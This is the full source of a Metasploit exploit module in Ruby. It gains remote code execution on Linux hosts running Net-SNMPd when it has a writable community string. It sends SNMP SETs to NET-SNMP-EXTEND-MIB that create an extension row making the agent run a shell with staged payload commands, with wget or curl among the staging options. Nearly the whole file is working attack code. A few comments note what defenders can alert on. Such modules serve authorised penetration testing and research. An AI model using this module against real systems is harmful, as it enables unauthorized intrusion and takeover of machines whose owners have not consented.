##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'snmp'
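# Net-SNMPd write-access module built on NET-SNMP-EXTEND-MIB, which lets an
# SNMP SET create an "extension" row naming a program the agent will run.
#
# Precondition (visible in #execute_command): a community string with SET
# (write) access to the agent. From a defender's view the exposure is the
# writable community itself: an agent that only honours read-only communities
# rejects the SETs this module depends on, and SET PDUs against OIDs under
# 1.3.6.1.4.1.8072.1.3.2 from unexpected sources are the event to alert on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  # NET-SNMP-EXTEND-MIB OIDs for the extension row named "tmp". The trailing
  # ".3.116.109.112" is the length-prefixed ASCII encoding of that name.
  NS_EXTEND_STATUS_OID = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112' # nsExtendStatus."tmp"
  NS_EXTEND_COMMAND_OID = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112' # nsExtendCommand."tmp"
  NS_EXTEND_ARGS_OID = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112' # nsExtendArgs."tmp"
  # Read back and printed (verbose mode only) after each SET. It sits in the
  # ...1.3.2.4 subtree rather than the configuration table above; see the MIB
  # document listed under 'References' for its definition.
  NS_EXTEND_RESULT_OID = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'
  # RowStatus value createAndGo(4): create the row and activate it in one SET.
  CREATE_AND_GO = 4

  # Registers module metadata and the FILEPATH / CHUNKSIZE / SHELL options.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
        'Description' => %q{
          This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
          configure MIB extensions and lead to remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Steve Embling at InteliSecure'],
        'References' => [
          [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt'],
          [ 'URL', 'https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e'],
          [ 'URL', 'https://digi.ninja/blog/snmp_to_shell.php'],
          [ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']
        ],
        'Payload' => {
          # Not a hard limit: the stager splits the payload into CHUNKSIZE-byte
          # writes, so this can be raised if a larger payload is required.
          'Space' => 4096
          # 'BadChars' => "\x00"
        },
        'Targets' => [
          [
            'Linux x86', {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]
            }
          ],
          [
            'Linux x64', {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]
            }
          ]
        ],
        # Not tested on other platforms but confirmed the above works.
        'DisclosureDate' => '2004-05-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
        # OptInt rather than OptString: the value is only ever consumed as an
        # integer (see #exploit), so reject non-numeric input at option-set time.
        OptInt.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200]),
        OptString.new('SHELL', [true, 'Shell to call with -c argument', '/bin/bash'])
      ]
    )
  end

  # CmdStager callback, invoked once per staged chunk.
  #
  # Each call performs two SNMP SET transactions that (re)create the "tmp"
  # extension row so the agent runs `SHELL -c "<cmd>"`, reading
  # NS_EXTEND_RESULT_OID back after each one. The second pass is deliberate:
  # the original author observed that the first rewrite appears to remove the
  # row and the next reinstates it, and treats a timeout there as a good sign.
  #
  # @param cmd [String] command text produced by the stager
  # @param opts [Hash] unused; present to satisfy the CmdStager callback signature
  # @return [void]
  def execute_command(cmd, opts = {})
    # Bourne-flavoured stagers already emit shell-safe text; every other
    # flavour is escaped before being wrapped in -c "...".
    escaped = flavor == :bourne ? cmd : cmd.shellescape
    args = "-c \"#{escaped}\""
    community = datastore['COMMUNITY']

    vprint_status(args)
    open_manager(community) do |manager|
      manager.set(extension_varbinds(datastore['SHELL'], args))
      vprint_status(manager.get_value(NS_EXTEND_RESULT_OID).to_s)
    end

    # Hit same again, first rewrite appears to remove the MIB, the next reinstates it.
    open_manager(community) do |manager|
      begin
        manager.set(extension_varbinds(datastore['SHELL'], args))
        vprint_status(manager.get_value(NS_EXTEND_RESULT_OID).to_s)
      rescue SNMP::RequestTimeout
        print_good("SNMP request timeout (this is promising).")
      end
    end
  end

  # Entry point: hands the payload to the command stager, which calls
  # #execute_command for each CHUNKSIZE-byte piece, staging under FILEPATH.
  def exploit
    execute_cmdstager(linemax: datastore['CHUNKSIZE'].to_i, temp: datastore['FILEPATH'])
  end

  private

  # Opens an SNMP session against RHOST/RPORT using +community+ and yields
  # the manager; SNMP::Manager.open closes the session when the block returns.
  #
  # @param community [String] community string sent with every PDU
  # @yieldparam manager [SNMP::Manager]
  def open_manager(community, &block)
    SNMP::Manager.open(Host: rhost, Port: rport, Community: community, &block)
  end

  # Builds the three varbinds of one SET: row status createAndGo, the program
  # to run, and its argument string. Fresh objects are built per call so each
  # SET transaction carries its own varbinds, as the original code did.
  #
  # @param command [String] value for nsExtendCommand (the SHELL option)
  # @param args [String] value for nsExtendArgs
  # @return [Array<SNMP::VarBind>]
  def extension_varbinds(command, args)
    [
      SNMP::VarBind.new(NS_EXTEND_STATUS_OID, SNMP::Integer.new(CREATE_AND_GO)),
      SNMP::VarBind.new(NS_EXTEND_COMMAND_OID, SNMP::OctetString.new(command)),
      SNMP::VarBind.new(NS_EXTEND_ARGS_OID, SNMP::OctetString.new(args))
    ]
  end
end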